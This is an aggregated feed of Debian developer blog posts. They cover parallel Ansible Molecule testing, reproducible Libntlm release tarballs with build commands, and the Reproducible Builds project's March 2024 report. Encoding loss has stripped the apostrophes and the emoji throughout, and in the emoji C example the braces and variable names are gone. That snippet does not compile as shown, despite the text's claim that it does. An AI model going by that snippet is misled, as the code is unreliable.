    • Update my SSH public key. [ ]
In addition, Mattia Rizzolo added some new host details. [ ]

If you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. However, you can get in touch with us via:

1 May 2024

Guido G nther: Free Software Activities April 2024

A short status update of what happened on my side last month. Maintenance and code review keep to be the top time sinks (in a positive way). If you want to support my work see donations.

28 April 2024

Evgeni Golov: Running Ansible Molecule tests in parallel

Or "How I've halved the execution time of our tests by removing ten lines". Catchy, huh? Also not exactly true, but quite close. Enjoy! Molecule?! "Molecule project is designed to aid in the development and testing of Ansible roles." No idea about the development part (I have vim and mkdir), but it's really good for integration testing. You can write different test scenarios where you define an environment (usually a container), a playbook for the execution and a playbook for verification. (And a lot more, but that's quite unimportant for now, so go read the docs if you want more details.) If you ever used Beaker for Puppet integration testing, you'll feel right at home (once you've thrown away Ruby and DSLs and embraced YAML for everything). I'd like to point out one thing, before we continue. Have another look at the quote above. "Molecule project is designed to aid in the development and testing of Ansible roles." That's right. The project was started in 2015 and was always about roles. There is nothing wrong about that, but given the Ansible world has moved on to collections (which can contain roles), you start facing challenges. Challenges using Ansible Molecule in the Collections world The biggest challenge didn't change since the last time I looked at the topic in 2020: running tests for multiple roles in a single repository ("monorepo") is tedious. Well, guess what a collection is? Yepp, a repository with multiple roles in it. It did get a bit better though. There is pytest-ansible now, which has integration for Molecule. This allows the execution of Molecule and even provides reasonable logging with something as short as:
% pytest --molecule roles/
That's much better than the shell script I used in 2020! However, being able to execute tests is one thing. Being able to execute them fast is another one. Given Molecule was initially designed with single roles in mind, it has switches to run all scenarios of a role (--all), but it has no way to run these in parallel. That's fine if you have one or two scenarios in your role repository. But what if you have 10 in your collection? "No way?!" you say after quickly running molecule test --help, "But there is "
% molecule test --help
Usage: molecule test [OPTIONS] [ANSIBLE_ARGS]...
 
  --parallel / --no-parallel      Enable or disable parallel mode. Default is disabled.
 
Yeah, that switch exists, but it only tells Molecule to place things in separate folders, you still need to parallelize yourself with GNU parallel or pytest. And here our actual journey starts! Running Ansible Molecule tests in parallel To run Molecule via pytest in parallel, we can use pytest-xdist, which allows pytest to run the tests in multiple processes. With that, our pytest call becomes something like this:
% MOLECULE_OPTS="--parallel" pytest --numprocesses auto --molecule roles/
What does that mean? However, once we actually execute it, we see:
% MOLECULE_OPTS="--parallel" pytest --numprocesses auto --molecule roles/
 
WARNING  Driver podman does not provide a schema.
INFO     debian scenario test matrix: dependency, cleanup, destroy, syntax, create, prepare, converge, idempotence, side_effect, verify, cleanup, destroy
INFO     Performing prerun with role_name_check=0...
WARNING  Retrying execution failure 250 of: ansible-galaxy collection install -vvv --force ../..
ERROR    Command returned 250 code:
 
OSError: [Errno 39] Directory not empty: 'roles'
 
FileExistsError: [Errno 17] File exists: b'/home/user/namespace.collection/collections/ansible_collections/namespace/collection'
 
FileNotFoundError: [Errno 2] No such file or directory: b'/home/user/namespace.collection//collections/ansible_collections/namespace/collection/roles/my_role/molecule/debian/molecule.yml'
You might see other errors, other paths, etc, but they all will have one in common: they indicate that either files or directories are present, while the tool expects them not to be, or vice versa. Ah yes, that fine smell of race conditions. I'll spare you the wild-goose chase I went on when trying to find out what the heck was calling ansible-galaxy collection install here. Instead, I'll just point at the following line:
INFO     Performing prerun with role_name_check=0...
What is this "prerun" you ask? Well "To help Ansible find used modules and roles, molecule will perform a prerun set of actions. These involve installing dependencies from requirements.yml specified at the project level, installing a standalone role or a collection." Turns out, this step is not --parallel-safe (yet?). Luckily, it can easily be disabled, for all our roles in the collection:
% mkdir -p .config/molecule
% echo 'prerun: false' >> .config/molecule/config.yml
This works perfectly, as long as you don't have any dependencies. And we don't have any, right? We didn't define any in a molecule/collections.yml, our collection has none. So let's push a PR with that and see what our CI thinks.
OSError: [Errno 39] Directory not empty: 'tests'
Huh?
FileExistsError: [Errno 17] File exists: b'remote.sh' -> b'/home/runner/work/namespace.collection/namespace.collection/collections/ansible_collections/ansible/posix/tests/utils/shippable/aix.sh'
What?
ansible_compat.errors.InvalidPrerequisiteError: Found collection at '/home/runner/work/namespace.collection/namespace.collection/collections/ansible_collections/ansible/posix' but missing MANIFEST.json, cannot get info.
Okay, okay, I get the idea But why? Well, our collection might not have any dependencies, BUT MOLECULE HAS! When using Docker containers, it uses community.docker, when using Podman containers.podman, etc So we have to install those before running Molecule, and everything should be fine. We even can use Molecule to do this!
$ molecule dependency --scenario <scenario>
And with that knowledge, the patch to enable parallel Molecule execution on GitHub Actions using pytest-xdist becomes:
diff --git a/.config/molecule/config.yml b/.config/molecule/config.yml
new file mode 100644
index 0000000..32ed66d
--- /dev/null
+++ b/.config/molecule/config.yml
@@ -0,0 +1 @@
+prerun: false
diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml
index 0f9da0d..df55a15 100644
--- a/.github/workflows/test.yml
+++ b/.github/workflows/test.yml
@@ -58,9 +58,13 @@ jobs:
       - name: Install Ansible
         run: pip install --upgrade https://github.com/ansible/ansible/archive/$  matrix.ansible  .tar.gz
       - name: Install dependencies
-        run: pip install molecule molecule-plugins pytest pytest-ansible
+        run: pip install molecule molecule-plugins pytest pytest-ansible pytest-xdist
+      - name: Install collection dependencies
+        run: cd roles/repository && molecule dependency -s suse
       - name: Run tests
-        run: pytest -vv --molecule roles/
+        run: pytest -vv --numprocesses auto --molecule roles/
+        env:
+          MOLECULE_OPTS: --parallel
   ansible-lint:
     runs-on: ubuntu-latest
But you promised us to delete ten lines, that's just a +7-2 patch! Oh yeah, sorry, the +10-20 (so a net -10) is the foreman-operations-collection version of the patch, that also migrates from an ugly bash script to pytest-ansible. And yes, that cuts down the execution from ~26 minutes to ~13 minutes. In the collection I originally tested this with, it's a more moderate "from 8-9 minutes to 5-6 minutes", which is still good though :)

26 April 2024

Russell Coker: Convergence vs Transference

I previously wrote a blog post titled Considering Convergence [1] about the possible ways of using a phone as a laptop. While I still believe what I wrote there I m now considering the possibility of ease of movement of work in progress as a way of addressing some of the same issues. Currently the expected use is that if you have web pages open on Chrome on Android it s possible to instruct Chrome on the desktop to open the same page if both instances of Chrome are signed in to the same GMail account. It s also possible to view the Chrome history with CTRL-H, select tabs from other devices and load things that were loaded on other devices some time ago. This is very minimal support for moving work between devices and I think we can do better. Firstly for web browsing the Chrome functionality is barely adequate. It requires having a heavyweight login process on all browsers that includes sharing stored passwords etc which isn t desirable. There are many cases where moving work is desired without sharing such things, one example is using a personal device to research something for work. Also the Chrome method of sending web pages is slow and unreliable and the viewing history method gets all closed tabs when the common case is get the currently open tabs from one browser window without wanting the dozens of web pages that turned out not to be interesting and were closed. This could be done with browser plugins to allow functionality similar to KDE Connect for sending tabs and also the option of emailing a list of URLs or a JSON file that could be processed by a browser plugin on the receiving end. I can send email between my home and work addresses faster than the Chrome share to another device function can send a URL. For documents we need a way of transferring files. One possibility is to go the Chromebook route and have it all stored on the web. This means that you rely on a web based document editing system and the FOSS versions are difficult to manage. Using Google Docs or Sharepoint for everything is not something I consider an acceptable option. Also for laptop use being able to run without Internet access is a good thing. There are a range of distributed filesystems that have been used for various purposes. I don t think any of them cater to the use case of having a phone/laptop and a desktop PC (or maybe multiple PCs) using the same files. For a technical user it would be an option to have a script that connects to a peer system (IE another computer with the same accounts and access control decisions) and rsync a directory of working files and the shell history, and then opens a shell with the HISTFILE variable, current directory, and optionally some user environment variables set to match. But this wouldn t be the most convenient thing even for technical users. For programs that are integrated into the desktop environment it s possible for them to be restarted on login if they were active when the user logged out. The session tracking for that has about 1/4 the functionality needed for requesting a list of open files from the application, closing the application, transferring the files, and opening it somewhere else. I think that this would be a good feature to add to the XDG setup. The model of having programs and data attached to one computer or one network server that terminals of some sort connect to worked well when computers were big and expensive. But computers continue to get smaller and cheaper so we need to think of a document based use of computers to allow things to be easily transferred as convenient. With convenience being important so the hacks of rsync scripts that can work for technical users won t work for most people.

24 April 2024

Russell Coker: Source Code With Emoji

The XKCD comic Code Quality [1] inspired me to test out emoji in source. I really should have done this years ago when that XKCD was first published. The following code compiles in gcc and runs in the way that anyone who wants to write such code would want it to run. The hover text in the XKCD comic is correct. You could have a style guide for such programming, store error messages in the doctor and nurse emoji for example.
#include <stdio.h>
int main()
 
  int   = 1,   = 2;
  printf(" =%d,  =%d\n",  ,  );
  return 0;
 
To get this to display correctly in Debian you need to install the fonts-noto-color-emoji package (used by the KDE emoji picker that runs when you press Windows-. among other things) and restart programs that use emoji. The Konsole terminal emulator will probably need it s profile settings changed to work with this if you ran Konsole before installing fonts-noto-color-emoji. The Kitty terminal emulator works if you restart it after installing fonts-noto-color-emoji. This web page gives a list of HTML codes for emoji [2]. If I start writing real code with emoji variable names then I ll have to update my source to HTML conversion script (which handles <>" and repeated spaces) to convert emoji. I spent a couple of hours on this and I think it s worth it. I have filed several Debian bug reports about improvements needed to issues related to emoji.

13 April 2024

Simon Josefsson: Reproducible and minimal source-only tarballs

With the release of Libntlm version 1.8 the release tarball can be reproduced on several distributions. We also publish a signed minimal source-only tarball, produced by git-archive which is the same format used by Savannah, Codeberg, GitLab, GitHub and others. Reproducibility of both tarballs are tested continuously for regressions on GitLab through a CI/CD pipeline. If that wasn t enough to excite you, the Debian packages of Libntlm are now built from the reproducible minimal source-only tarball. The resulting binaries are reproducible on several architectures. What does that even mean? Why should you care? How you can do the same for your project? What are the open issues? Read on, dear reader This article describes my practical experiments with reproducible release artifacts, following up on my earlier thoughts that lead to discussion on Fosstodon and a patch by Janneke Nieuwenhuizen to make Guix tarballs reproducible that inspired me to some practical work. Let s look at how a maintainer release some software, and how a user can reproduce the released artifacts from the source code. Libntlm provides a shared library written in C and uses GNU Make, GNU Autoconf, GNU Automake, GNU Libtool and gnulib for build management, but these ideas should apply to most project and build system. The following illustrate the steps a maintainer would take to prepare a release:
git clone https://gitlab.com/gsasl/libntlm.git
cd libntlm
git checkout v1.8
./bootstrap
./configure
make distcheck
gpg -b libntlm-1.8.tar.gz
The generated files libntlm-1.8.tar.gz and libntlm-1.8.tar.gz.sig are published, and users download and use them. This is how the GNU project have been doing releases since the late 1980 s. That is a testament to how successful this pattern has been! These tarballs contain source code and some generated files, typically shell scripts generated by autoconf, makefile templates generated by automake, documentation in formats like Info, HTML, or PDF. Rarely do they contain binary object code, but historically that happened. The XZUtils incident illustrate that tarballs with files that are not included in the git archive offer an opportunity to disguise malicious backdoors. I blogged earlier how to mitigate this risk by using signed minimal source-only tarballs. The risk of hiding malware is not the only motivation to publish signed minimal source-only tarballs. With pre-generated content in tarballs, there is a risk that GNU/Linux distributions such as Trisquel, Guix, Debian/Ubuntu or Fedora ship generated files coming from the tarball into the binary *.deb or *.rpm package file. Typically the person packaging the upstream project never realized that some installed artifacts was not re-built through a typical autoconf -fi && ./configure && make install sequence, and never wrote the code to rebuild everything. This can also happen if the build rules are written but are buggy, shipping the old artifact. When a security problem is found, this can lead to time-consuming situations, as it may be that patching the relevant source code and rebuilding the package is not sufficient: the vulnerable generated object from the tarball would be shipped into the binary package instead of a rebuilt artifact. For architecture-specific binaries this rarely happens, since object code is usually not included in tarballs although for 10+ years I shipped the binary Java JAR file in the GNU Libidn release tarball, until I stopped shipping it. For interpreted languages and especially for generated content such as HTML, PDF, shell scripts this happens more than you would like. Publishing minimal source-only tarballs enable easier auditing of a project s code, to avoid the need to read through all generated files looking for malicious content. I have taken care to generate the source-only minimal tarball using git-archive. This is the same format that GitLab, GitHub etc offer for the automated download links on git tags. The minimal source-only tarballs can thus serve as a way to audit GitLab and GitHub download material! Consider if/when hosting sites like GitLab or GitHub has a security incident that cause generated tarballs to include a backdoor that is not present in the git repository. If people rely on the tag download artifact without verifying the maintainer PGP signature using GnuPG, this can lead to similar backdoor scenarios that we had for XZUtils but originated with the hosting provider instead of the release manager. This is even more concerning, since this attack can be mounted for some selected IP address that you want to target and not on everyone, thereby making it harder to discover. With all that discussion and rationale out of the way, let s return to the release process. I have added another step here:
make srcdist
gpg -b libntlm-1.8-src.tar.gz
Now the release is ready. I publish these four files in the Libntlm s Savannah Download area, but they can be uploaded to a GitLab/GitHub release area as well. These are the SHA256 checksums I got after building the tarballs on my Trisquel 11 aramo laptop:
91de864224913b9493c7a6cec2890e6eded3610d34c3d983132823de348ec2ca  libntlm-1.8-src.tar.gz
ce6569a47a21173ba69c990965f73eb82d9a093eb871f935ab64ee13df47fda1  libntlm-1.8.tar.gz
So how can you reproduce my artifacts? Here is how to reproduce them in a Ubuntu 22.04 container:
podman run -it --rm ubuntu:22.04
apt-get update
apt-get install -y --no-install-recommends autoconf automake libtool make git ca-certificates
git clone https://gitlab.com/gsasl/libntlm.git
cd libntlm
git checkout v1.8
./bootstrap
./configure
make dist srcdist
sha256sum libntlm-*.tar.gz
You should see the exact same SHA256 checksum values. Hooray! This works because Trisquel 11 and Ubuntu 22.04 uses the same version of git, autoconf, automake, and libtool. These tools do not guarantee the same output content for all versions, similar to how GNU GCC does not generate the same binary output for all versions. So there is still some delicate version pairing needed. Ideally, the artifacts should be possible to reproduce from the release artifacts themselves, and not only directly from git. It is possible to reproduce the full tarball in a AlmaLinux 8 container replace almalinux:8 with rockylinux:8 if you prefer RockyLinux:
podman run -it --rm almalinux:8
dnf update -y
dnf install -y make wget gcc
wget https://download.savannah.nongnu.org/releases/libntlm/libntlm-1.8.tar.gz
tar xfa libntlm-1.8.tar.gz
cd libntlm-1.8
./configure
make dist
sha256sum libntlm-1.8.tar.gz
The source-only minimal tarball can be regenerated on Debian 11:
podman run -it --rm debian:11
apt-get update
apt-get install -y --no-install-recommends make git ca-certificates
git clone https://gitlab.com/gsasl/libntlm.git
cd libntlm
git checkout v1.8
make -f cfg.mk srcdist
sha256sum libntlm-1.8-src.tar.gz 
As the Magnus Opus or chef-d uvre, let s recreate the full tarball directly from the minimal source-only tarball on Trisquel 11 replace docker.io/kpengboy/trisquel:11.0 with ubuntu:22.04 if you prefer.
podman run -it --rm docker.io/kpengboy/trisquel:11.0
apt-get update
apt-get install -y --no-install-recommends autoconf automake libtool make wget git ca-certificates
wget https://download.savannah.nongnu.org/releases/libntlm/libntlm-1.8-src.tar.gz
tar xfa libntlm-1.8-src.tar.gz
cd libntlm-v1.8
./bootstrap
./configure
make dist
sha256sum libntlm-1.8.tar.gz
Yay! You should now have great confidence in that the release artifacts correspond to what s in version control and also to what the maintainer intended to release. Your remaining job is to audit the source code for vulnerabilities, including the source code of the dependencies used in the build. You no longer have to worry about auditing the release artifacts. I find it somewhat amusing that the build infrastructure for Libntlm is now in a significantly better place than the code itself. Libntlm is written in old C style with plenty of string manipulation and uses broken cryptographic algorithms such as MD4 and single-DES. Remember folks: solving supply chain security issues has no bearing on what kind of code you eventually run. A clean gun can still shoot you in the foot. Side note on naming: GitLab exports tarballs with pathnames libntlm-v1.8/ (i.e.., PROJECT-TAG/) and I ve adopted the same pathnames, which means my libntlm-1.8-src.tar.gz tarballs are bit-by-bit identical to GitLab s exports and you can verify this with tools like diffoscope. GitLab name the tarball libntlm-v1.8.tar.gz (i.e., PROJECT-TAG.ARCHIVE) which I find too similar to the libntlm-1.8.tar.gz that we also publish. GitHub uses the same git archive style, but unfortunately they have logic that removes the v in the pathname so you will get a tarball with pathname libntlm-1.8/ instead of libntlm-v1.8/ that GitLab and I use. The content of the tarball is bit-by-bit identical, but the pathname and archive differs. Codeberg (running Forgejo) uses another approach: the tarball is called libntlm-v1.8.tar.gz (after the tag) just like GitLab, but the pathname inside the archive is libntlm/, otherwise the produced archive is bit-by-bit identical including timestamps. Savannah s CGIT interface uses archive name libntlm-1.8.tar.gz with pathname libntlm-1.8/, but otherwise file content is identical. Savannah s GitWeb interface provides snapshot links that are named after the git commit (e.g., libntlm-a812c2ca.tar.gz with libntlm-a812c2ca/) and I cannot find any tag-based download links at all. Overall, we are so close to get SHA256 checksum to match, but fail on pathname within the archive. I ve chosen to be compatible with GitLab regarding the content of tarballs but not on archive naming. From a simplicity point of view, it would be nice if everyone used PROJECT-TAG.ARCHIVE for the archive filename and PROJECT-TAG/ for the pathname within the archive. This aspect will probably need more discussion. Side note on git archive output: It seems different versions of git archive produce different results for the same repository. The version of git in Debian 11, Trisquel 11 and Ubuntu 22.04 behave the same. The version of git in Debian 12, AlmaLinux/RockyLinux 8/9, Alpine, ArchLinux, macOS homebrew, and upcoming Ubuntu 24.04 behave in another way. Hopefully this will not change that often, but this would invalidate reproducibility of these tarballs in the future, forcing you to use an old git release to reproduce the source-only tarball. Alas, GitLab and most other sites appears to be using modern git so the download tarballs from them would not match my tarballs even though the content would. Side note on ChangeLog: ChangeLog files were traditionally manually curated files with version history for a package. In recent years, several projects moved to dynamically generate them from git history (using tools like git2cl or gitlog-to-changelog). This has consequences for reproducibility of tarballs: you need to have the entire git history available! The gitlog-to-changelog tool also output different outputs depending on the time zone of the person using it, which arguable is a simple bug that can be fixed. However this entire approach is incompatible with rebuilding the full tarball from the minimal source-only tarball. It seems Libntlm s ChangeLog file died on the surgery table here. So how would a distribution build these minimal source-only tarballs? I happen to help on the libntlm package in Debian. It has historically used the generated tarballs as the source code to build from. This means that code coming from gnulib is vendored in the tarball. When a security problem is discovered in gnulib code, the security team needs to patch all packages that include that vendored code and rebuild them, instead of merely patching the gnulib package and rebuild all packages that rely on that particular code. To change this, the Debian libntlm package needs to Build-Depends on Debian s gnulib package. But there was one problem: similar to most projects that use gnulib, Libntlm depend on a particular git commit of gnulib, and Debian only ship one commit. There is no coordination about which commit to use. I have adopted gnulib in Debian, and add a git bundle to the *_all.deb binary package so that projects that rely on gnulib can pick whatever commit they need. This allow an no-network GNULIB_URL and GNULIB_REVISION approach when running Libntlm s ./bootstrap with the Debian gnulib package installed. Otherwise libntlm would pick up whatever latest version of gnulib that Debian happened to have in the gnulib package, which is not what the Libntlm maintainer intended to be used, and can lead to all sorts of version mismatches (and consequently security problems) over time. Libntlm in Debian is developed and tested on Salsa and there is continuous integration testing of it as well, thanks to the Salsa CI team. Side note on git bundles: unfortunately there appears to be no reproducible way to export a git repository into one or more files. So one unfortunate consequence of all this work is that the gnulib *.orig.tar.gz tarball in Debian is not reproducible any more. I have tried to get Git bundles to be reproducible but I never got it to work see my notes in gnulib s debian/README.source on this aspect. Of course, source tarball reproducibility has nothing to do with binary reproducibility of gnulib in Debian itself, fortunately. One open question is how to deal with the increased build dependencies that is triggered by this approach. Some people are surprised by this but I don t see how to get around it: if you depend on source code for tools in another package to build your package, it is a bad idea to hide that dependency. We ve done it for a long time through vendored code in non-minimal tarballs. Libntlm isn t the most critical project from a bootstrapping perspective, so adding git and gnulib as Build-Depends to it will probably be fine. However, consider if this pattern was used for other packages that uses gnulib such as coreutils, gzip, tar, bison etc (all are using gnulib) then they would all Build-Depends on git and gnulib. Cross-building those packages for a new architecture will therefor require git on that architecture first, which gets circular quick. The dependency on gnulib is real so I don t see that going away, and gnulib is a Architecture:all package. However, the dependency on git is merely a consequence of how the Debian gnulib package chose to make all gnulib git commits available to projects: through a git bundle. There are other ways to do this that doesn t require the git tool to extract the necessary files, but none that I found practical ideas welcome! Finally some brief notes on how this was implemented. Enabling bootstrappable source-only minimal tarballs via gnulib s ./bootstrap is achieved by using the GNULIB_REVISION mechanism, locking down the gnulib commit used. I have always disliked git submodules because they add extra steps and has complicated interaction with CI/CD. The reason why I gave up git submodules now is because the particular commit to use is not recorded in the git archive output when git submodules is used. So the particular gnulib commit has to be mentioned explicitly in some source code that goes into the git archive tarball. Colin Watson added the GNULIB_REVISION approach to ./bootstrap back in 2018, and now it no longer made sense to continue to use a gnulib git submodule. One alternative is to use ./bootstrap with --gnulib-srcdir or --gnulib-refdir if there is some practical problem with the GNULIB_URL towards a git bundle the GNULIB_REVISION in bootstrap.conf. The srcdist make rule is simple:
git archive --prefix=libntlm-v1.8/ -o libntlm-1.8-src.tar.gz HEAD
Making the make dist generated tarball reproducible can be more complicated, however for Libntlm it was sufficient to make sure the modification times of all files were set deterministically to the timestamp of the last commit in the git repository. Interestingly there seems to be a couple of different ways to accomplish this, Guix doesn t support minimal source-only tarballs but rely on a .tarball-timestamp file inside the tarball. Paul Eggert explained what TZDB is using some time ago. The approach I m using now is fairly similar to the one I suggested over a year ago. If there are problems because all files in the tarball now use the same modification time, there is a solution by Bruno Haible that could be implemented. Side note on git tags: Some people may wonder why not verify a signed git tag instead of verifying a signed tarball of the git archive. Currently most git repositories uses SHA-1 for git commit identities, but SHA-1 is not a secure hash function. While current SHA-1 attacks can be detected and mitigated, there are fundamental doubts that a git SHA-1 commit identity uniquely refers to the same content that was intended. Verifying a git tag will never offer the same assurance, since a git tag can be moved or re-signed at any time. Verifying a git commit is better but then we need to trust SHA-1. Migrating git to SHA-256 would resolve this aspect, but most hosting sites such as GitLab and GitHub does not support this yet. There are other advantages to using signed tarballs instead of signed git commits or git tags as well, e.g., tar.gz can be a deterministically reproducible persistent stable offline storage format but .git sub-directory trees or git bundles do not offer this property. Doing continous testing of all this is critical to make sure things don t regress. Libntlm s pipeline definition now produce the generated libntlm-*.tar.gz tarballs and a checksum as a build artifact. Then I added the 000-reproducability job which compares the checksums and fails on mismatches. You can read its delicate output in the job for the v1.8 release. Right now we insists that builds on Trisquel 11 match Ubuntu 22.04, that PureOS 10 builds match Debian 11 builds, that AlmaLinux 8 builds match RockyLinux 8 builds, and AlmaLinux 9 builds match RockyLinux 9 builds. As you can see in pipeline job output, not all platforms lead to the same tarballs, but hopefully this state can be improved over time. There is also partial reproducibility, where the full tarball is reproducible across two distributions but not the minimal tarball, or vice versa. If this way of working plays out well, I hope to implement it in other projects too. What do you think? Happy Hacking!

11 April 2024

Reproducible Builds: Reproducible Builds in March 2024

Welcome to the March 2024 report from the Reproducible Builds project! In our reports, we attempt to outline what we have been up to over the past month, as well as mentioning some of the important things happening more generally in software supply-chain security. As ever, if you are interested in contributing to the project, please visit our Contribute page on our website. Table of contents:
  1. Arch Linux minimal container userland now 100% reproducible
  2. Validating Debian s build infrastructure after the XZ backdoor
  3. Making Fedora Linux (more) reproducible
  4. Increasing Trust in the Open Source Supply Chain with Reproducible Builds and Functional Package Management
  5. Software and source code identification with GNU Guix and reproducible builds
  6. Two new Rust-based tools for post-processing determinism
  7. Distribution work
  8. Mailing list highlights
  9. Website updates
  10. Delta chat clients now reproducible
  11. diffoscope updates
  12. Upstream patches
  13. Reproducibility testing framework

Arch Linux minimal container userland now 100% reproducible In remarkable news, Reproducible builds developer kpcyrd reported that that the Arch Linux minimal container userland is now 100% reproducible after work by developers dvzv and Foxboron on the one remaining package. This represents a real world , widely-used Linux distribution being reproducible. Their post, which kpcyrd suffixed with the question now what? , continues on to outline some potential next steps, including validating whether the container image itself could be reproduced bit-for-bit. The post, which was itself a followup for an Arch Linux update earlier in the month, generated a significant number of replies.

Validating Debian s build infrastructure after the XZ backdoor From our mailing list this month, Vagrant Cascadian wrote about being asked about trying to perform concrete reproducibility checks for recent Debian security updates, in an attempt to gain some confidence about Debian s build infrastructure given that they performed builds in environments running the high-profile XZ vulnerability. Vagrant reports (with some caveats):
So far, I have not found any reproducibility issues; everything I tested I was able to get to build bit-for-bit identical with what is in the Debian archive.
That is to say, reproducibility testing permitted Vagrant and Debian to claim with some confidence that builds performed when this vulnerable version of XZ was installed were not interfered with.

Making Fedora Linux (more) reproducible In March, Davide Cavalca gave a talk at the 2024 Southern California Linux Expo (aka SCALE 21x) about the ongoing effort to make the Fedora Linux distribution reproducible. Documented in more detail on Fedora s website, the talk touched on topics such as the specifics of implementing reproducible builds in Fedora, the challenges encountered, the current status and what s coming next. (YouTube video)

Increasing Trust in the Open Source Supply Chain with Reproducible Builds and Functional Package Management Julien Malka published a brief but interesting paper in the HAL open archive on Increasing Trust in the Open Source Supply Chain with Reproducible Builds and Functional Package Management:
Functional package managers (FPMs) and reproducible builds (R-B) are technologies and methodologies that are conceptually very different from the traditional software deployment model, and that have promising properties for software supply chain security. This thesis aims to evaluate the impact of FPMs and R-B on the security of the software supply chain and propose improvements to the FPM model to further improve trust in the open source supply chain. PDF
Julien s paper poses a number of research questions on how the model of distributions such as GNU Guix and NixOS can be leveraged to further improve the safety of the software supply chain , etc.

Software and source code identification with GNU Guix and reproducible builds In a long line of commendably detailed blog posts, Ludovic Court s, Maxim Cournoyer, Jan Nieuwenhuizen and Simon Tournier have together published two interesting posts on the GNU Guix blog this month. In early March, Ludovic Court s, Maxim Cournoyer, Jan Nieuwenhuizen and Simon Tournier wrote about software and source code identification and how that might be performed using Guix, rhetorically posing the questions: What does it take to identify software ? How can we tell what software is running on a machine to determine, for example, what security vulnerabilities might affect it? Later in the month, Ludovic Court s wrote a solo post describing adventures on the quest for long-term reproducible deployment. Ludovic s post touches on GNU Guix s aim to support time travel , the ability to reliably (and reproducibly) revert to an earlier point in time, employing the iconic image of Harold Lloyd hanging off the clock in Safety Last! (1925) to poetically illustrate both the slapstick nature of current modern technology and the gymnastics required to navigate hazards of our own making.

Two new Rust-based tools for post-processing determinism Zbigniew J drzejewski-Szmek announced add-determinism, a work-in-progress reimplementation of the Reproducible Builds project s own strip-nondeterminism tool in the Rust programming language, intended to be used as a post-processor in RPM-based distributions such as Fedora In addition, Yossi Kreinin published a blog post titled refix: fast, debuggable, reproducible builds that describes a tool that post-processes binaries in such a way that they are still debuggable with gdb, etc.. Yossi post details the motivation and techniques behind the (fast) performance of the tool.

Distribution work In Debian this month, since the testing framework no longer varies the build path, James Addison performed a bulk downgrade of the bug severity for issues filed with a level of normal to a new level of wishlist. In addition, 28 reviews of Debian packages were added, 38 were updated and 23 were removed this month adding to ever-growing knowledge about identified issues. As part of this effort, a number of issue types were updated, including Chris Lamb adding a new ocaml_include_directories toolchain issue [ ] and James Addison adding a new filesystem_order_in_java_jar_manifest_mf_include_resource issue [ ] and updating the random_uuid_in_notebooks_generated_by_nbsphinx to reference a relevant discussion thread [ ]. In addition, Roland Clobus posted his 24th status update of reproducible Debian ISO images. Roland highlights that the images for Debian unstable often cannot be generated due to changes in that distribution related to the 64-bit time_t transition. Lastly, Bernhard M. Wiedemann posted another monthly update for his reproducibility work in openSUSE.

Mailing list highlights Elsewhere on our mailing list this month:

Website updates There were made a number of improvements to our website this month, including:
  • Pol Dellaiera noticed the frequent need to correctly cite the website itself in academic work. To facilitate easier citation across multiple formats, Pol contributed a Citation File Format (CIF) file. As a result, an export in BibTeX format is now available in the Academic Publications section. Pol encourages community contributions to further refine the CITATION.cff file. Pol also added an substantial new section to the buy in page documenting the role of Software Bill of Materials (SBOMs) and ephemeral development environments. [ ][ ]
  • Bernhard M. Wiedemann added a new commandments page to the documentation [ ][ ] and fixed some incorrect YAML elsewhere on the site [ ].
  • Chris Lamb add three recent academic papers to the publications page of the website. [ ]
  • Mattia Rizzolo and Holger Levsen collaborated to add Infomaniak as a sponsor of amd64 virtual machines. [ ][ ][ ]
  • Roland Clobus updated the stable outputs page, dropping version numbers from Python documentation pages [ ] and noting that Python s set data structure is also affected by the PYTHONHASHSEED functionality. [ ]

Delta chat clients now reproducible Delta Chat, an open source messaging application that can work over email, announced this month that the Rust-based core library underlying Delta chat application is now reproducible.

diffoscope diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This month, Chris Lamb made a number of changes such as uploading versions 259, 260 and 261 to Debian and made the following additional changes:
  • New features:
    • Add support for the zipdetails tool from the Perl distribution. Thanks to Fay Stegerman and Larry Doolittle et al. for the pointer and thread about this tool. [ ]
  • Bug fixes:
    • Don t identify Redis database dumps as GNU R database files based simply on their filename. [ ]
    • Add a missing call to File.recognizes so we actually perform the filename check for GNU R data files. [ ]
    • Don t crash if we encounter an .rdb file without an equivalent .rdx file. (#1066991)
    • Correctly check for 7z being available and not lz4 when testing 7z. [ ]
    • Prevent a traceback when comparing a contentful .pyc file with an empty one. [ ]
  • Testsuite improvements:
    • Fix .epub tests after supporting the new zipdetails tool. [ ]
    • Don t use parenthesis within test skipping messages, as PyTest adds its own parenthesis. [ ]
    • Factor out Python version checking in test_zip.py. [ ]
    • Skip some Zip-related tests under Python 3.10.14, as a potential regression may have been backported to the 3.10.x series. [ ]
    • Actually test 7z support in the test_7z set of tests, not the lz4 functionality. (Closes: reproducible-builds/diffoscope#359). [ ]
In addition, Fay Stegerman updated diffoscope s monkey patch for supporting the unusual Mozilla ZIP file format after Python s zipfile module changed to detect potentially insecure overlapping entries within .zip files. (#362) Chris Lamb also updated the trydiffoscope command line client, dropping a build-dependency on the deprecated python3-distutils package to fix Debian bug #1065988 [ ], taking a moment to also refresh the packaging to the latest Debian standards [ ]. Finally, Vagrant Cascadian submitted an update for diffoscope version 260 in GNU Guix. [ ]

Upstream patches This month, we wrote a large number of patches, including: Bernhard M. Wiedemann used reproducibility-tooling to detect and fix packages that added changes in their %check section, thus failing when built with the --no-checks option. Only half of all openSUSE packages were tested so far, but a large number of bugs were filed, including ones against caddy, exiv2, gnome-disk-utility, grisbi, gsl, itinerary, kosmindoormap, libQuotient, med-tools, plasma6-disks, pspp, python-pypuppetdb, python-urlextract, rsync, vagrant-libvirt and xsimd. Similarly, Jean-Pierre De Jesus DIAZ employed reproducible builds techniques in order to test a proposed refactor of the ath9k-htc-firmware package. As the change produced bit-for-bit identical binaries to the previously shipped pre-built binaries:
I don t have the hardware to test this firmware, but the build produces the same hashes for the firmware so it s safe to say that the firmware should keep working.

Reproducibility testing framework The Reproducible Builds project operates a comprehensive testing framework running primarily at tests.reproducible-builds.org in order to check packages and other artifacts for reproducibility. In March, an enormous number of changes were made by Holger Levsen:
  • Debian-related changes:
    • Sleep less after a so-called 404 package state has occurred. [ ]
    • Schedule package builds more often. [ ][ ]
    • Regenerate all our HTML indexes every hour, but only every 12h for the released suites. [ ]
    • Create and update unstable and experimental base systems on armhf again. [ ][ ]
    • Don t reschedule so many depwait packages due to the current size of the i386 architecture queue. [ ]
    • Redefine our scheduling thresholds and amounts. [ ]
